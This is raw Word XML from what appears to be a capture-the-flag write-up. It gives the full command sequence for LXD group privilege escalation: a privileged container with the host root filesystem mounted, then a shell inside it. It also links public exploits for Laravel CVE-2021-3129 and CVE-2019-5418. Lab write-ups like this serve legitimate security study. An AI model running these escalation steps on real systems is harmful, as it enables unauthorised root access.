          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. With this association, it is possible to escalate privileges on the system by using the lxd group to mount the root filesystem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inside a container, which may allow elevated access or command execution with privileged permissions.</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90600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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perform the exploitation, we can follow the steps in the article below:</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hyperlink r:id="rId29">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://hacktricks.boitatech.com.br/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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11300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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6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16637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0" l="0" r="0" t="0"/>
            <wp:docPr id="5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image on the server, we can execute the command below and then simply press </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"Enter"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the options until completion:</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mv alpine-v3.8-i686-20250127_1252.tar.gz /dev/shm</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/dev/shm</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lxc image import "./alpine-v3.8-i686-20250127_1252.tar.gz" --alias myimage</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lxd init</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84200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="60"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commands above, we continue with the following commands:</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lxc init myimage mycontainer -c security.privileged=true</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lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true</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lxc start mycontainer</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lxc exec mycontainer /bin/sh</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in this way, we can obtain the final flag.</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84200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="49"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939800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="64"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943600" cy="939800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>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E">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5" name="image11.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image1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8.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image8.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Beta</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hyperlink" Target="https://www.ambionics.io/blog/laravel-debug-rce" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/0x0d3ad/CVE-2021-3129" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image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6.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.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hacktricks.boitatech.com.br/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation" TargetMode="Externa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2.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mpgn/CVE-2019-5418" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/0x0d3ad/CVE-2021-3129" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ambionics.io/blog/laravel-debug-rce" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ambionics/phpgg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L3wk9gkkaVKWzCku1wyitFL4g==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLjdiODhuM281dTd5YjIOaC52a25ic3Fra3h5djgyDmguMTc1ZjVjczk0ejBvOAByITFCcUpJNU1KcnhHVHkyQnJyR1BMRmpPQWIxWUdIajdnVw==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